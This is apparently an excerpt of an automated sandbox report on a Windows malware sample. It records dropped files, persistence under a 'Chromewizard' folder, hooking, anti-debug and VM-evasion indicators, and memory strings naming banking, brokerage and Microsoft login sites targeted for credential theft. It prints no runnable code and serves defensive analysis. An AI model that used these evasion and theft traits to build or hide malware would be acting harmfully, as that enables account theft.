                  Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ntdll.pdb source: Localdockerv3.exe, 00000008.00000002.2164083320.0000000004716000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168990180.0000000006F13000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167276865.0000000005F15000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2164818824.0000000004D1A000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2167476156.000000000611F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2163833523.0000000004517000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168743092.0000000006D14000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165292012.0000000005116000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2165803793.000000000551C000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2166502980.0000000005912000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2168051496.0000000006719000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2162708356.0000000003D1F000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2169225892.0000000007118000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbt| source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdbaK source: Localdockerv3.exe, 00000008.00000003.1989221143.0000000000AF1000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: FC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\al\Temp source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974363760.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: dC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\al State source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ticsnp3} source: Localdockerv3.exe, 00000008.00000003.1984593483.0000000000AB7000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: m\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State>pC}d source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: YC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: winload_prod.pdb981804 source: Localdockerv3.exe, 00000008.00000003.1975392028.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1981844538.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973247885.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979646405.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1975940137.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974495162.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1972872733.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1974639041.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1973606653.0000000000AF2000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: ]\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: Localdockerv3.exe, 00000008.00000003.1972872733.0000000000ADB000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1971865227.0000000000ADA000.00000004.00000001.00020000.00000000.sdmp
                  Source: Binary string: a\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Localdockerv3.exe, 00000008.00000003.1978437994.0000000000AB5000.00000004.00000001.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1979019647.0000000000AB8000.00000004.00000001.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
                  Source: yhg.4.drStatic PE information: real checksum: 0x27e49f should be: 0x27db64
                  Source: 9mauyKC3JW.exeStatic PE information: real checksum: 0x33302 should be: 0x8b3f1a
                  Source: iepdf32.dll.2.drStatic PE information: real checksum: 0x460121 should be: 0x4572ac
                  Source: cvnmq.16.drStatic PE information: real checksum: 0x27e49f should be: 0x27db64
                  Source: iepdf32.dll.0.drStatic PE information: real checksum: 0x460121 should be: 0x4572ac
                  Source: hv.exe.0.drStatic PE information: section name: .didata
                  Source: iepdf32.dll.0.drStatic PE information: section name: .00cfg
                  Source: iepdf32.dll.0.drStatic PE information: section name: malloc_h
                  Source: hv.exe.2.drStatic PE information: section name: .didata
                  Source: iepdf32.dll.2.drStatic PE information: section name: .00cfg
                  Source: iepdf32.dll.2.drStatic PE information: section name: malloc_h
                  Source: Localdockerv3.exe.4.drStatic PE information: section name: Shared
                  Source: yhg.4.drStatic PE information: section name: .xdata
                  Source: yhg.4.drStatic PE information: section name: sii
                  Source: cvnmq.16.drStatic PE information: section name: .xdata
                  Source: cvnmq.16.drStatic PE information: section name: sii
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00411C20 push eax; ret 0_2_00411C4E
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CD2C57B push ecx; ret 2_2_6CD2C58E
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001282D push 8B480014h; retf 8_2_0000000140012832
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_000000014001D949 push rsp; ret 8_2_000000014001D94B
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140013D4C pushfq ; ret 8_2_0000000140013D4D
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140013DE5 pushfq ; ret 8_2_0000000140013DE6
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeCode function: 8_2_0000000140013F26 pushfq ; ret 8_2_0000000140013F27
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\cvnmqJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeFile created: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\Localdockerv3.exeJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeFile created: C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeFile created: C:\Users\user\AppData\Local\Temp\hv.exeJump to dropped file
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeFile created: C:\Users\user\AppData\Local\Temp\iepdf32.dllJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\cvnmqJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YHG
                  Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\CVNMQ
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\conhost.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeAPI/Special instruction interceptor: Address: 6C7E7C44
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeAPI/Special instruction interceptor: Address: 6C7E7C44
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeAPI/Special instruction interceptor: Address: 6C7E7945
                  Source: C:\Windows\SysWOW64\cmd.exeAPI/Special instruction interceptor: Address: 6C7E3B54
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\cvnmqJump to dropped file
                  Source: C:\Windows\SysWOW64\cmd.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\yhgJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Chromewizard\iepdf32.dllJump to dropped file
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\iepdf32.dllJump to dropped file
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeAPI coverage: 3.4 %
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 2772Thread sleep time: -90000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 6588Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 636Thread sleep time: -62139s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Localdockerv3.exe TID: 6676Thread sleep time: -30000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,0_2_0040301A
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00402B79
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                  Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1897543523.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160225088.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWq
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                  Source: Localdockerv3.exe, 00000008.00000003.1897543523.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.1997936658.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2159559087.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000002.2160225088.000000000053D000.00000004.00000020.00020000.00000000.sdmp, Localdockerv3.exe, 00000008.00000003.2112620225.000000000053D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                  Source: Localdockerv3.exe, 00000008.00000002.2160225088.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                  Source: Localdockerv3.exe, 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                  Source: 9mauyKC3JW.exe, 00000000.00000002.1503032928.0000000000700000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                  Source: Localdockerv3.exe, 00000008.00000003.1979230521.000000000827B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CD4A7D6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6CD4A7D6
                  Source: C:\Users\user\Desktop\9mauyKC3JW.exeCode function: 0_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,0_2_00406D5D
                  Source: C:\Users\user\AppData\Local\Temp\hv.exeCode function: 2_2_6CAF7104 mov eax, dword ptr fs:[00000030h]2_2_6CAF7104
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 3_2_6C2D7104 mov eax, dword ptr fs:[00000030h]3_2_6C2D7104
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 9_2_6C377104 mov eax, dword ptr fs:[00000030h]9_2_6C377104
                  Source: C:\Users\user\AppData\Roaming\Chromewizard\hv.exeCode function: 15_2_6BD97104 mov eax, dword ptr fs:[00000030h]15_2_6BD97104
